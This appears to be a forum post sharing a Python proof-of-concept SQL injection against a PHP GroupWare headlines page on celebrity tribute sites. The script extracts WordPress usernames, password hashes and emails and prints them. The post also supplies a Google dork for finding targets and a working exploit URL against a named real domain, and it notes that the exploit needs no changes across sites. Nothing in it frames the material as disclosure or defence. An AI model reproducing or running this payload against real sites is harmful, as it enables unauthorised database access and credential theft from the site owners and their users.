PoC - PHP GroupWare Headlines Admin SQLi
Here's a PoC for an SQL injection which affects a bunch of sites dedicated to dead celebrities; some examples include:
  • Malcolm X
  • Marilyn Monroe
  • Andre The Giant
  • Jean Harlow
  • Ella Fitzgerald
and more :)

For a full list of sites, the following Google dork will work: inurl:viewheadline.php?id=

Code:
from sys import argv, exit
from urllib import urlopen   # Python 2: urllib.urlopen (urllib.request.urlopen in Python 3)
from re import findall

if len(argv) < 2:
    exit('Usage: python file.py http://vulnsite.com/path/')

print "\n// P0ISON.ORG // POC // 17/1/2015 // \n\n"

# UNION-based injection into the id parameter: the 23-column SELECT behind
# viewheadline.php is matched column for column, and column 6 (the one the
# page renders as the headline title) carries user_login:user_pass:user_email
# pulled from the WordPress wp_users table.
payload = 'viewheadline.php?id=-9%27%20union%20select%201,2,3,4,5,concat(user_login,0x3a,user_pass,0x3a,user_email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from wp_users--+'

arg = argv[1]

# Prepend the scheme if a bare host/path was given
if arg[0:7] != "http://":
    url = "http://" + str(arg)
else:
    url = arg

data = urlopen(url + str(payload)).read()

# The injected column is reflected inside the headline title span
matches = findall(r"<span class=\"newstitle\">(.*?)</span>", data)

for match in matches:
    x = match.split(":")
    print "User: " + str(x[0]) + " | Password: " + str(x[1]) + " | E-mail: " + str(x[2]) + "\n"

Working example:

Code:
http://www.cmgww.com/stars/monroe/about/viewheadline.php?id=1344viewheadline.php?id=-9%27%20union%20select%201,2,3,4,5,concat%28user_login,0x3a,user_pass,0x3a,user_email%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20wp_users--+%27

Something funny to note is that the admin hash and usernames of the admin accounts are the SAME for all affected websites. In addition to this, the column count is static, so the PoC will work the same for all affected sites without needing modifications to the source or a method for determining the column count.